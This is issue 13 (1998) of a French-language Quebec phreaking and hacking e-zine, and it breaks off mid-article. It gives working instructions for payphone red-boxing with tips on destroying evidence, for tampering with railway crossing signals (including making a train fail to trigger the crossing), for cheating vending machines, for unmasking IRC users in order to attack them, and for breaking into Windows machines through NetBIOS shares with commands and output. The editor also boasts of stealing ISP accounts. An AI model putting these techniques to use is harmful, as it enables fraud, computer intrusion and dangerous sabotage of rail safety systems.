Copy Link
Add to Bookmark
Report

Total Control 13

eZine's profile picture
Published in 
Total Control
 · 4 years ago

  

*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8
___________________________________________
| | WE CONTROL YOU AND THERE'S
| .x |
| ....nnnH> :MM" | NOTHING YOU CAN DO ABOUT IT
| 'HHMMMMMMMMMM> :MMf |
| ""`` MMX xMM"
|
| MMM XMM" | /$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\
| 'MMM> :MMf | $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
| 'MMM> MMM | $$$$$ $$$$$
| 'MMMX :MMX | $$$$$ Total Control is : $$$$$
| XMMMX XMMX | $$$$$ $$$$$
| XMMMM XMMX | $$$$$ * Err418 $$$$$
| XMMMM> 'MMM | $$$$$ $$$$$
| MMMMML ?MMX | $$$$$ * MindUser $$$$$
| MMMMMX *MMX | $$$$$ $$$$$
| MMMMMM #MMM. | $$$$$ * Cluster $$$$$
| MMMMMM `*MMh: | $$$$$ $$$$$
| 'MMMMMM> `"
*MMhx. | $$$$$ $$$$$
| '*****M! `"*M | $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
| | $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
| TOTAL CONTROL | \$$$$$$$$$$$$$$$$$$$$$$$$$$$$$/
| |
| * M A G A Z I N E * |
|_________________________________________|

*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8

*----------------------------------------------------------------------------*
Ý Ý
Ý Total Control, Num‚ro 13, Mai 1998 Ý
Ý Ý
Ý http://totalcontrol.home.ml.org Ý
Ý Ý
*----------------------------------------------------------------------------*
Ý Groupes affili‚s : BELL - QUEBECTEL - TELEBEC - NORTEL - GRC - FBI - CIA Ý
*----------------------------------------------------------------------------*

/------------------\
| AVERTISSEMENT |
\------------------/

Ce document contient des informations ill‚gales si vous les utilisez mais
puisque, ici, elles ne sont distribu‚es que pour des fins ‚ducatives,
elles peuvent ˆtre consid‚r‚es ‚tant l‚gales (vous me suivez ?). Le personnel
de Total Control ne vous encourage pas … utiliser ces techniques.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
0=--------------=0
| Introduction |
0=--------------=0
Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Bonjour … vous tous lecteur de TC magazine. J'espŠre que vous allez
bien... moi je me porte … merveille. Nous avons introduit un nouveau membre
dans le staff de Total Control et il s'agit de Cluster. D'ailleurs, le ASCII
d'ouverture de ce num‚ro est de lui. Cluster est, comme les autres membres de
TC, amoureux de la t‚l‚phonie et des Millenniums. Alors, Cluster, nous te
souhaitons la bienvenue dans notre ‚quipe et j'espŠre que tu t'y impliqueras
avec beaucoup de plaisir :-)

En passant, si vous souhaitez nous parler sur IRC, vous pouvez nous
trouver sur le channel #tctrl sur EFNET.

Ok, now, voici un petite publicit‚ que j'ai promise au groupe de h/p
de la r‚gion de Qu‚bec : Corruption Addicts. Ce groupe est trŠs actif sur la
scŠne de la ville de Qu‚bec et contient des ex-membres de NPC alors n'h‚sitez
pas … les rencontrez sur #c-a (efnet) et sur leur site que vous pouvez voir
… l'URL suivante : www.asphyxiie.org/corruption ! Je vous le dis, les releases
sont vraiment de qualit‚ et le site est magnifique (chapeau nmare !). De plus,
le fondateur de C-A, Phaust, m'a dit que s'il d‚cide de se bouger un jour, il
‚crirait un article pour Total Control... espŠrons qu'il se d‚cide... :-)

******* BREAKING NEWS *******
Le groupe C-A est mort... et oui... Phaust et Nmare ont re‡u la visite de la
GRC … leur appartement et se sont fait confisquer leur matos informatique...
Je tiens … dire que le BUST est survenu aprŠs que le groupe se dissoude donc
ne pensez pas que la GRC a r‚ussi … tuer un des meilleurs groupes du Quebec.
Il s'agit d'une d‚cision commune de tout les membres de C-A.

DerniŠre chandelle … C-A et bonne chance … Nmare et … Phaust !
******* BREAKING NEWS *******

Si vous d‚sirez contribuer … TC magazine, envoyez vos articles … :
err418@technologist.com et il me fera un plaisir de les mettre dans un
prochain num‚ro. Bonne lecture !


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Le courrier des lecteurs
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

---------------------------------------------------------------------
Date: Fri, 17 Apr 1998 22:38:09 -0400
From: Fatal Speed <karnage@webworqs.com>
To: err418@technologist.com
Subject: yahoo

Salut mon toi!
Heye super, Total Control!!!
Ca fait 3-4 mois que j'me bidonne en lisant PLA (l'original, the only
one), pis assteure je peut le faire en francais... wouhou!!!!
Continue a sortir des issue, on apprecie!
A plusse.. hehe

Fatal Speed

-------------------
R‚ponse

TC: hehehe merci d'aimer notre travail... continue de lire TC !

---------------------------------------------------------------------
From: drunky_99@hotmail.com
To: err418@technologist.com
Subject: un fan de ton zine
Date: Thu, 16 Apr 1998 10:34:17 PDT

Salut, moi c‚ Drunky!

Je viens de d‚couvrir ton zine (20 avril 1998).Il ‚tait temps que
quelqu`un parle de phreaker sur le scŠne du Qu‚bec. Pour ma part je suis
plutot sur la scŠne du cracking (trŠs nouveau, mais j'ai des bons progs).
D`ailleurs en naviguant sur le net, j`ai tomb‚ sur le prog Revelation!
C'est un prog qui d‚voile les passwords qui sont sous ast‚riques avec
Win95.

Tu installes le prog sur une disquette pis tu fais le tour des magasins
qui ont internet en d‚monstration. Tu t'assures qu'il n'y a personne autour
de toi (‚vident). Tu run le prog pis voil…! En passant je ne suis pas
responsable de vos activit‚s ill‚gales, … vos risques et p‚rilles!

Vous direz surement "
Ou trouver ce programme ?" Facile www.snadboy.com
En embarquant sur la page vous aller dans le link Revelation.
Avant de downloader le prog je vous conseille d'aller voir les "
screen
shot" pour mieux comprendre comment marche le programme.

Goodbye and nice cracking!
From your alcoholic friend Drunky...

-------------------
R‚ponse

TC: Salut Drunky, ouais c super cool ce prog l…... Ca fait un bout que
ici on l'utilise... j'te dis que j'en ai ramasser des accounts PPP de
QuebecTel avec le truc des magasins... Le pire c'est que ca me sert
… rien moi alors je les donnes … un accros que je connais (acxel ;-)

---------------------------------------------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
D‚couvrez qui se cache derriŠre une adresse spoof‚e
Par Merlin2 (digital2@hotmail.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Bon, ‚tant donn‚ que de plus en plus de monde ont des adresses spoof‚es
lorsqu'il vous nuke ou autre, voici un moyen de trouver leur IP. Voici les
instructions … suivre que j'ai trouver sur le site de Anti-online (vous
trouvez plusieurs bons programmes pour vous protegez ou attaquer):

#1. Votre moniteur vous avertit que quelqu'un vous nuke, et vous voulez
voir l'ip de quelqu'un que vous pensez que c'est. vous faite /whois JP
(JP est le nick). Vous trouvez que JP est JP@this.is.a.spoofed.ad

#2. Vous faites un /dns this.is.a.spoofed.ad. Nous d‚couvrons alors que le
hostmask ne se r‚sout pas. Cela nous permet de savoir que JP est
probablement entrain de faire du spoofing.

#3. Aucun problŠme. Nous n'avons qu'… taper une simple petite commande de
serveur IRC, Soit: /quote userip JP. Qui nous donne:

JP=+JP@130.49.71.21

Nous avons maintenant son vrai IP.

#4. Maintenant, une fois encore nous tapons /dns 130.49.71.21. Ce qui
donne son addresse DNS qui est quelque chose comme :

jpvst7.j.resnet.pitt.com

#5. Cela peut maintenant ais‚ment vous aidez … confirmer vos doute, et
mˆme le nuker vous aussi.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Des photos de Millennium
Par Cluster (cluster@comports.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Voici des photos des diff‚rents types de Millennium. Les fichiers sont joints
avec TC #13 et sont disponibles dans la section FILEZ du site web.

Fichier Grosseur Contenu
======= ======== =======
img001.jpg 22k T‚l‚phone Millennium de table
img002.jpg 24k T‚l‚phone Millennium … cartes
img003.jpg 24k T‚l‚phone Millennium … paiement universel

Rincez-vous l'oeil :-)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Le Red Boxing au Qu‚bec : Mythe ou r‚alit‚ ?
Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Le red boxing est un vrai fl‚au aux USA et il connait aussi quelques
balbutiments au CaCanada :-) Cependant, dans notre belle province, qu'en ai-t'il?
Dans cet article, vous d‚couvrirez l'univers du Red boxing de fond en comble.
Voici les diff‚rentes parties qui composeront mon texte :

1) Qu'est-ce que le Red Boxing ?
2) Comment a-t-il ‚t‚ d‚couvert ?
3) Comment faire sa Red Box ?
4) Sur quel t‚l‚phone public ‡a marche ?
5) Est-ce risqu‚ ?

1) Qu'est-ce que le Red Boxing ?
================================

Avant de vous expliquer qu'est-ce qu'une Red Box, vous devez savoir
comment fonctionne le paiement, la v‚rification et l'authorisation lorsque
vous placez un appel.

* Note: Le terme "
t‚l‚phone" dans cet article r‚fŠre aux t‚l‚phones publics
de type NON-millennium soit les Centurions qui sont habituellement
noirs ou bruns.

Quand vous voulez appeller … un num‚ro … partir d'un Centurion, la
compagnie de t‚l‚phone doit savoir combien d'argent vous mettez dans le "
coin
slot". Pour un appel local, la v‚rification attends que vous ayez mis un
25 cents et alors vous permet de placer votre appel. S'il s'agit d'un appel
interurbain, la TeLcO attends que vous d‚posiez le montant n‚cessaire avant de
vous laissez placer l'appel. Pour effectuer toutes ces ‚tapes de v‚rification
et d'authorisation, le t‚l‚phone et la centrale doivent communiquer entre eux
et ils le font avec l'aide de tonalit‚ (N-ACTS). C'est-…-dire que lorsque
vous ins‚rez, par exemple, 25 cents dans la coin slot, le t‚l‚phone ‚mets
sur la ligne une tonalit‚ pr‚cise. Pour une piŠce de 10 cents, le t‚l‚phone
‚mets une tonalit‚ mais d'une autre fr‚quence. Il existe une tonalit‚
diff‚rente pour chaque piŠce de monnaie support‚e par le Centurion.

Le principe de la Red Box est fort simple quand vous connaissez
comment le t‚l‚phone et la centrale communique ensemble. Il suffit d'‚mettre
les tonalit‚s vous-mˆmes au que ce soit le t‚l‚phone qui les ‚mette. Vous me
direz s–rement : MAIS COMMENT CELA EST POSSIBLE ? Ceci est possible puisque
le t‚l‚phone et la centrale communique sur la mˆme ligne t‚l‚phonique qui
vous sert … placer vos appels DONC qui est reli‚ au combin‚ du t‚l‚phone.
Et oui ! C'est aussi simple que ‡a, il suffit d'‚mettre les tonalit‚s … mˆme
l'endroit ou vous parlez... avec le combin‚. En r‚sum‚, c'est ainsi que le
Red Boxing fonctionne : on ‚met des "
fausses" tonalit‚s pour tromper la
centrale et lui faire croire que l'argent … ‚t‚ introduit dans le t‚l‚phone.

2) Comment a-t-il ‚t‚ d‚couvert ?
=================================

Grƒce … un article dans un journal d'ing‚nieur d'AT&T qui diffusait
les fr‚quences des tonalit‚s correspondantes aux piŠces de monnaies (ACTS),
des ‚tudiants du MIT (Minnesota Institute of Technology) en ing‚nirie ont
fait quelques tests et se sont rendus compte que l'‚mission de "
fausses"
tonalit‚s ‚tait possible. Ils publiŠrent une s‚rie d'articles sur leur
trouvaille dans des journaux universitaires et c'est ainsi que cette technique
tomba entre les mains de ceux qui savent comment l'exploiter : les phreaks.

3) Comment faire sa Red Box ?
=============================

Si ce texte est le premier sur le Red Boxing que vous lisez, vous
devez ˆtre tout excit‚s et vous devez crier comme des d‚fonc‚s devant votre
‚cran : "
Mais merde, c'est ben trop hot tout ‡a.... COMMENT JE M'EN FAIS UNE?
Envoye crache le mottons que je m'y mette tout de suite !!!!" Et bien voici
ce que vous attendez...

Il existe deux techniques pour se faire sa propre Red Box. Celle
de l'enregistrement et celle du "
dialer radio shack". Personnellement, je
trouve la technique de l'enregistreuse plus facile … faire et celle du
"
dialer" un peu trop technique. C'est pour ‡a que je n'expliquerai pas comment
faire une Red Box avec la technique "
dialer" mais en gros il s'agit de prendre
un "
dialer" (en vente chez Radio Shack) et de modifier le diamants pour que
les fr‚quences ‚misses ne soient plus celles du compositeur (1234567890*#)
mais celles que l'on a de besoin pour la Red Box. Je ne sais mˆme pas quelles
doivent ˆtre les caract‚ristiques du diamant pour pouvoir ‚mettre les
tonalit‚s frauduleuses...

Donc, voici la technique de l'enregistreuse. Vous avez besoin d'un
objet capable d'enregistrer des sons et des tonalit‚s n‚cessaires. Faites
attention puisque les tonalit‚s canadiennes (N-ACTS) diffŠrent des celles
utilis‚es aux USA (ACTS). Vous utilisez l'objet d'enregistrement pour mettre
les tonalit‚s sur son support d'enregistrement et aprŠs vous allez les faire
jouer avec cet objet devant la partie utilis‚e pour parler du combin‚.
Attention : la qualit‚ du son des tonalit‚s doit ˆtre BONNE.

Vous me demanderez s–rement : Mais ou prendre les tonalit‚s
valides pour le Canada ? Et bien, sur le site de ToTal Control dans la
section FILEZ et elles seront aussi jointes … ce num‚ro de TC (ca-tones.zip).

Un dernier conseil : utilisez si possible un petit gadget
d'enregistrement num‚rique rapide pour enregistrer les tonalit‚s parce que
‡a fait un peur suspect de mettre une enregistreuse en avant d'un combin‚ ou
encore pire, un Gatto Blaster. hehehehe. (Petite parenthŠse, savez-vous quelle
est la traduction fran‡aise de Gatto Blaster ? C'est un TONNITRUANT. C'‚tait
une question dans un de mes examens de fran‡ais … un moment donn‚... SHIT
Merde, je d‚lire... excusez-moi :-)

4) Sur quel t‚l‚phone public ‡a marche ?
========================================

Sur TOUS les t‚l‚phones publics non-digitals. Donc, excluez les
Millennium : NON le Millennium ne communique pas avec la TelCo pour effectuer
une v‚rification de montant.. il v‚rifie LUI-MÒME le tout et il authorise
LUI-MÒME l'appel. Aucune communication avec la centrale lorsqu'un appel est
plac‚.

QUELS SONT VULNRABLES ? RPONSE : Les Centurions

5) Est-ce risqu‚ ?
==================

Bien s–r, le Red Boxing est un acte criminel de fraude t‚l‚phonique
et est sanctionn‚ par le Code Criminel, donc il repr‚sente un risque.

Cependant, ce risque reste assez faible puisqu'au Qu‚bec les TelCos
n'ont pas a faire face … un fl‚au et ne sont pas consciente que ce ph‚nomŠne
peut leur causer du tort donc ne surveille pas activement ce genre de fraude.

Voici quelques conseils de s–ret‚ que vous devez respect‚ pour Red
Boxer avec plus de s–ret‚ :

- Si une de vos tentatives de Red Boxing ‚chout, changez de t‚l‚phone ou
cessez vos activit‚es de Red Boxing pour la journ‚e.

- Ne pas Red Boxer pour placer un appel local.

- Uilisez un petit gadget d'enregistrement digital rapide pour vos tonalit‚s.
Ceci vous permettra d'appuyer sur le bouton RECORD si vous voyez les policiers
arriv‚s donc d'effacer toutes les preuves de votre actes :-)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Comment niaiser des truckers avec une track de chemin de fer
Par Crow Killer (diane.chasse@sympatico.ca)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Pr‚face
=======

Toutes les voies ferr‚es ,au Canada, sont ‚quip‚es de "
d‚tecteurs" qui, acti-
v‚s par un train, allument les lumiŠres et les cloches prŠs des routes, right?
Imaginez que l'ont puisse les contr“ler a volont‚... (pour les pas vite, re-
gardez le titre).


Principe de fonctionnement
==========================
Pour comprendre, rien de mieux qu'une image:
(CN001.gif)

No 1: Poteaux lumineux (varient en hauteur et grosseur, selon l'endroit)
No 2: Poste central (trŠs grosse boŒte grise)
No 3: Poste de d‚tecteur (trŠs loin de la route, + petit que le poste central)
No 4: D‚tecteur (sorte de plaque de bois fix‚e a la track)

Quand un train passe sur les d‚tecteurs, il active une sorte de relais dans le
poste de d‚tecteur qui renvoit une impulsion ‚lectrique au poste central qui
dirige le courant du poteau ‚lectrique vers les lumiŠres.
En gros, c'est de mˆme que sa marche.

Les d‚tails
===========

Le poste central est reli‚ a une ligne de courant semblable a celle de
n'importe quel bulding. Soud‚ sur le boŒtier, il y aune sorte de COCOT grise
(avec une PETITE porte) qui contient une grosse switche et un carnet semblable
a celui plus bas qui allume les lumiŠres et la cloche."
On peut pas l'ouvrir: y
a un cadenas!" Mais cette sorte de cadenas (comme tous ceux du CN) s'ouvre avec
un box de ratchet 1/2. On s'en sert comme une cl‚ pour d‚visser la bolt a
l'int‚rieur. Tout ce qu'on a a faire c'est d'actionner la switche quand un
truck (ou mieux, un tanker) est … 100 pieds ou moins de la traverse de chemin
de fer. Seul inconv‚nient: on est bien trop proche de la route pour le faire
sans se faire voir. On en vient donc au poste de d‚tecteurs.

Les postes de d‚tecteurs contiennent:
(CN002.gif)

No 1: Batteries (transparentes)
No 2: Carnet ou fiche des "
bilans des inspections" (‚tat des piles, etc)
No 3: Indique … quel poids le d‚tecteur se d‚clenchera...
No 4: je le sais pas. (aprŠs tout, je n'ai que 13 ans!)
No 5: Fil venant du d‚tecteur et fil partant au poste central
Tuyau marqu‚ PVC: par ou passent les 2 fils reli‚s au poste central
Ligne bleue: bypass (voir plus bas)

Il s'ouvre de la mˆme fa‡on que l'autre mais l…, pour faire ce qu'on veut,
c'est plus compliqu‚. On va avoir besoin d'un fil pour faire un petits bypass
entre la bolt la plus en haut … droite des deux "
cossins inconnus" (No 4) et
le fil reliant la bolt en bas … gauche, vers le 2e fil. (demandez moi pas
pourquoi sa marche, je le sais pas: j'ai butch‚ et sa a march‚). *Petite remar-
que: il y a un d‚lai de 5 …10 secondes pour que le signal ai atteint le poste
central et d‚clenche tout le patatra. Vous avez donc en masse de temps pour
vous cacher.

ATTENTION! Examinez bien le petit carnet: il indique les dates des inspections
(en moyenne1 fois/semaine). Sa serait tu plate si tu te ferais buster...

Conclusion
==========

Voici quelques petites id‚es amusantes (exp‚riences personnelles):

-D‚clencher la cloche … 3 heure du matin

- Mettre la r‚sistance du poste des d‚tecteurs au plus haut a une heure pas-
sante (sa peut ˆtre pas mal dangereux, car si le train n'est pas assez pesant,
il ne d‚clenchera pas le relais du poste central...)

- Un de mes amis c'est achet‚ un relais t‚l‚command‚ de porte de garage (le
riche!) et aprŠs l'avoir install‚ sur une des batteries, il pouvait d‚clencher
le systŠme a distance!

(Note de Err418 : Comme tout bon ‚diteur et pr‚sident d'un zine de H/P/C, je
me dois de tester les techniques pr‚sent‚es dans le zine que j'‚dites. Alors,
moi et Funky, on est all‚ tester ce petit truc et j'Ai ‚t‚ r‚ellement d‚‡u
puisqu'il n'a pas fonctionn‚. CEPENDANT, l'auteur de cet article m'assure que
son article est vrai DONC je le crois... c'est tout... test it by yourself.)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Mes aventures avec les machines … Coke
Par Cluster (cluster@comports.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

En premier je voulais essayer de crosser un Millennium; J'avais perc‚ un 25
cents et attacher une corde … pˆche aprŠs, mais disons que ‡a n'a pas eu
l'effet attendu (faire des appels gratos) plut“t le 25 cents … redescendu dans
le "
retour des piŠces". De‡u du r‚sultat je me suis tourner vers une machine
… Coke, aprŠs 15 minutes de gossage j'ai r‚ussi … lui soutirer quelques 25
cents. Mais j'ai aussi remarque la grande instabilit‚ de ces machines la:
aprŠs avoir mit 1$ (la liqueur coutait 1,25$) je pŠse sur retour de change et
Hop! elle me redonne: 1$ et 4 x 25 cents. Bizarre!

Contrairement au Millennium les machines … liqueur on 2 compartiments:

Le premier pour accumuler ton cash
Le deuxiŠme qui contient du change classer genre en 1$, 25 cents, ...

Donc si quelqu'un ne re‡oit pas son change y'a de forte chance que si la
prochaine personne met moins que le co–t d'une liqueur (si t'en met plus ou
‚gal tu dois absolument en prendre une) et elle pŠse sur retour de monnaie ben
elle va surement pogner le change de la personne qui ne l'a pas re‡u. Amusant.

Si vous avez d'autres techniques pour crosser les Millenniums ou les Machines
… Coke e-mailer vos d‚couvertes …:

cluster@comports.com ou err418@technologist.com
------------------------------------------------------------------------------
En passant je voudrais f‚liciter un de nos supporters pour avoir d‚crisser le
lecteur de carte magn‚tique d'une Millennium … l'aide d'une barre de fer. Le
pauvre a afficher le message "
PiŠces de monnaie seulement" pendant 3 jours.
hahAHaHhe
------------------------------------------------------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Comment p‚n‚trer un dique dur
Par La PaNtHŠRe Du WeB (LaPaNtHeRe@hotmail.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Bonjour, voici deux techniques qui vont vous permettre de prendre le controle
d'un disk dur. La premiŠre technique, pour l'utiliser vous devez avoir NETBIOS
et votre victime doit avoir Windows 95 ou Windows NT. La deuxiŠme technique
est beaucoup plus simple... mais vous devez convaicre votre victime d'accepter
votre fichier pour ensuite vous connecter sur le port 666 avec Ws_ftp (plus
de d‚tail plus bas...)

1) PremiŠre technique avec NETBIOS
==================================

LE PRINCIPE :

Depuis que NT 3.51 existe, Microsoft a implement‚ des commandes permettant de
communiquer avec d'autres PC, tout ca juste avec un driver pour votre carte
r‚seau, le protocole NETBEUI d'install‚, et le tout en ligne de commande, ce
qui permettait de r‚aliser des installations … distance par exemple. C'est
d'ailleurs encore beaucoup utilis‚, une simple disquette de boot, et paf, vous
pouvez installer plein de postes. Ce protocole NETBEUI, reposant sur NETBIOS,
vous permet entre autres de partager des ressources sur le r‚seau, … condition
d'avoir install‚ le client "
Client pour le r‚seaux Microsoft", et d'avoir
activ‚ l'option "
Permettre … d'autres utilisateurs d'utiliser mes fichiers".
Dans ce cas, vous pourrez alors voir ce qui est partag‚ dans le fameux
Voisinage r‚seau de Partageur 95 ou de NT 4. Certains d'entre vous sont en
train de lire ceci, se dise : "
Arfff le con, il sait mˆme pas que Internet ‡a
repose sur les protocoles TCP/IP et pas NETBEUI". Et l…, je vous r‚ponds :
"
Je sais mon enfant, mais il existe une passerelle !!". "Une passerelle ?
Entre NETBEUI et TCP/IP ?? Je le crois pas ? C'est pas possible ???" me
r‚pondrez vous !! Et pourtant si !! Microsoft ne pouvait pas se permettre
d'interdire ce type de passerelle, car tous les r‚seaux Internet utilisent
TCP/IP, et il fallait un moyen de convertir les noms de machines sous NETBEUI
en adresse IP. C'est ce que fait le fichier LMHOST dans votre r‚pertoire
WINDOWS. Logiquement, si vous regardez maintenant, il n'existe pas, mais en
revanche vous devez avoir un LMHOSTS.SAM qui traŒne, qui est un fichier
d'exemple. Allez donc y jeter un coup d'oeil...

Donc vous avez compris, avec LMHOST, on peut donc aller voir les ressources
partag‚es de quelqu'un, … partir du moment qu'on connait son IP, le nom de sa
machine et ses ressources partag‚es. Et il faut aussi qu'il ait des ressources
partag‚es ‚videmment, mais ‡a faut pas ˆtre polytechnicien pour le comprendre.
Vu comme ‡a, ‡a fait beaucoup de chose … savoir.. mais pas tant que ‡a en fin
de compte, car Bill qui est bon pour nous, nous a donn‚ plein de belles
fonctions qui vont nous aider … combler les trous.

PremiŠre chose, pogner l'IP. L…, rien de plus facile, vous repŠrez l'IP ou
l'adresse du gars sur IRC par exemple. Si c'est l'IP num‚rique du type
123.123.123.123, pas de problŠme, si c'est un truc du genre
marcel@routeur.domaine.com, vous faites: PING -a routeur.domaine.com et vous
aurez son IP. Voil… une bonne chose de faite. Maintenant, ‡a serait sympa de
savoir le nom d'ordinateur de la personne dont vous voulez voir le disque dur.
Pour cela, Bill nous offre la fonction NBTSTAT qui permet de voir l'‚tat d'un
adapteur r‚seau, et les infos le concernant.

Tapez donc :
NBTSTAT -A 127.127.127.127 <- L'adresse IP de la cible hein , pas celle ci...

Ah oui, le -A signifie que c'est une adresse IP num‚rique que l'on donne.
N'OUBLIER PAS, A MAJUSCULE)

Si la cible a NETBEUI d'install‚, vous devriez obtenir un truc du style :


C:\>NBTSTAT -A 194.114.95.141

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
MAURO <00> UNIQUE Registered
MICA <00> GROUP Registered
MAURO <03> UNIQUE Registered
MAURO <20> UNIQUE Registered
MICA <1E> GROUP Registered

MAC Address = 44-45-53-54-00-00

(SI C'EST CRIT "
HOST NOT FOUND", C'EST QUE VOUS DEVEZ CHANGER DE CIBLE...)

Ce qui vous int‚resse c'est les noms avec ‚crit UNIQUE … c“t‚. Votre cible
utilise forc‚ment l'un de ces noms de machines en ce moment mˆme !! Et c'est
l… qu'intervient LMHOSTS.

Vous ‚ditez LMHOSTS avec EDIT par exemple, et vous tapez dans ce fichier :

194.114.95.141 MAURO #PRE

Donc, l'IP, suivi du nom de machine, suivi de #PRE, pour indiquer que cette
correspondance entre l'IP et le nom de machine doit ˆtre pr‚charg‚, pour ainsi
passer AVANT la r‚solution DNS.

Ensuite, on va r‚initialiser notre fichier LMHOSTS que vous venez juste de
sauvegarder, n'est ce pas ? Pour cela, vous tapez :

C:\>NBTSTAT -R

Et si tout se passe bien, vous obtenez :

"
Successful purge and preload of the NBT Remote Cache Name Table."

Maintenant, nous allons nous occuper de chercher les ressources partag‚es par
notre copain.

Pour voir les ressources, vous allez taper NET VIEW, VIEW comme "
voir" en
anglais, remarquez comme les choses sont bien faites. D'ailleurs cette
commande NET est extrˆmement puissante, faites donc un NET /? Pour vous en
convaincre !! Donc, ‡a doit donner un truc comme :

NET VIEW \\MAURO (MAURO car l… nous passons sur le protocole NETBEUI,
LMHOSTS va se charger de convertir le nom de machine en IP)

Et hop, dans mon exemple, ‡a donne ‡a :

(C'EST LA QUE MOI J'AI QUELQUES PROBLÒMES, JE NE RUSSI PAS A PASSER CETTE
TAPE...)

C:\>NET VIEW \\MAURO

Ressources partag‚es … \\MAURO

Nom de partage Type Commentaire

---------------------------------------------------

C Disque

D Disque

E Disque

HP4L Impr.

G Disque

I Disque

Ex‚cution achev‚e.


Je sais donc que tous ces lecteurs sont partag‚s. Parfait, on va donc aller
faire un tour sur le C: .

La commande NET arrive Š ma rescousse :

C:\>NET USE \\MAURO\C

K: Connect‚ … \\MAURO\C

